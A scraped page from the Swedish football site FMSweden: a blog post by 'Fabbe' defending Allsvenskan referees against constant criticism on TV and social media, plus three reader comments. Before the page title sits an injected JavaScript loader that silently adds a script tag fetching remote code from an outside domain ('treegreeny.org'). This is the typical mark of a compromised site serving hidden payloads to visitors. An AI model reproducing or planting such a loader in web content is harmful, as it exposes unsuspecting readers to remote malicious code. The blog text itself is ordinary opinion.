;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Karlsson + Nyberg + Fabbe = sant – FMSweden
Meny Stäng

Fabbes blogg: Karlsson + Nyberg + Fabbe = sant

Jag har blivit någon jag aldrig trodde jag skulle bli. Jag har ridit ut i domarnas försvar – vad ska hända härnäst?

Som fotbollsspelare är jag en gnällig jävel. Jag har åsikter om precis allting som mina medspelare gör, som motståndarna gör och som domarna gör. Framförallt de sistnämnda har under mina år på fotbollsplan fått höra både det ena och andra ute på plan, och så ska det ju till viss del vara. Så frågan är hur jag nu kan tycka att det gått för långt?

Varenda allsvensk omgång diskuteras domare numera. Dplay matar ut situation efter situation i sändningarna och på sociala medier, och varenda litet steg domarna tar ska analyseras in i minsta detalj. Kunde Glenn Nyberg gjort annorlunda här? Hur kunde Kristoffer Karlsson inte blåsa straff där? Alla dessa situationer som hela tiden ska analyseras har skapat ett klimat i svensk fotboll idag där det är helt okej att öppet såga domarna hur som helst. Varenda misstag blir enormt, och får en spridning som aldrig förr. Är det så vi vill ha det framöver?

Missförstå mig rätt, klart att domarna har gjort enorma misstag i år. Och det är inte heller det jag försvarar, utan min ståndpunkt är istället att misstagen inte har blivit fler och domarna blivit sämre de senaste 10 åren. Skillnaden är klimatet som sociala medier och ansvariga bolag skapat, där domarna helt plötsligt har blivit viktigare att analysera än själva matchen. Något som jag ställer mig enormt frågande till. Känslan är att det inte direkt blir enklare att döma fotbollsmatcher om man vet att varenda beslut man tar kommer att diskuteras i en studio direkt efter matcherna, och hur du än gör kommer det att bli fel. Självklart har även VAR en del här, då debatten kring domarnivå överlag i världsfotbollen har förändrats.

Men domarna måste ju kunna bli petade om de är dåliga precis som spelarna? Ja, om det nu vore så enkelt att det står 20 toppdomare på kö och väntar på att få hoppa in och döma allsvenskan. De domarna som är där är ju det av en anledning: de bedöms vara bäst i Sverige. Ska vi då hålla på och stänga av domare för att ge sämre domare matcherna istället? Nej är svaret på den frågan.  Precis som att man inte sätter in en 15-åring för att ytterbacken har slagit ett inlägg till inkast för 76:e gången i rad.

Så avslutningsvis kommer nu en uppmaning från mig. Gnäll på domarna hur mycket ni vill när ni spelar, tyck att de är värdelösa och skäll ut någon stackars linjeman i division fem. Men bli inte en del av det klimatet där det är okej att kritisera varenda domslut på Twitter. Fokusera istället på fotbollen som spelas, så hoppas vi att vi får se så många matcher som möjligt i de avslutande omgångarna där domarna inte syns. För då vet alla att de är som absolut bäst.


Innan någon nu letar upp någon Tweet där jag klagat på domarnivån så försvarar jag mig med att ibland rinner bägaren över även för mig. Vilket också varit en bidragande orsak att jag börjat tänka i de här banorna istället.

 

Over and out!

Please wait...

Liknande Inlägg

3 kommentarer

 1. Micke

  Förstår hur du tänker, men samtidigt blir det fruktansvärt frustrerande när ens lag gång på gång tappar poäng på grund av felaktiga domslut som man inte kan påverka. Särskilt när storlagen i högre utsträckning får sådana avgörande och tveksamma beslut med sig. Då blir det svårt att hålla tillbaka ilskan ibland.

  • Fabian Andersson

   Absolut, men det är för mig en annan fråga när vi börjar diskutera storlagen kontra smålagen. Det har ju ingenting med hur domarnivån i allmänhet, den skillnaden finns ju även bland de bästa domarna enligt mig (även om de aldrig skulle erkänna det själva). Och lika självklart är det att det inte borde vara så.

 2. trashbag

  Jag har aldrig förstått rättigheten som spelare/ledare med mera tar sig att klaga på domarna under match. Dom vrålar ju inte i mitt ansikte om jag slår en felpassning? Nej nu må jag slå mig själv för bröstet men jag klagade endast på domarna dom gångerna dom helt enkelt hade helt fruktansvärt fel. Ni vet sådär som att ge matchstraff till fel kille i ditt innebandylag för att dom tog fel på rödhårig kille 1 och 2. Då förklarade man med hög röst att det var fel. Tycker fotbollen och andra sporter har mycket av lära från handbollen och rent sportsmannamässigt hade nog jag bättre passat in där än som fotbollsspelare som var min huvudsport.

Lämna ett svar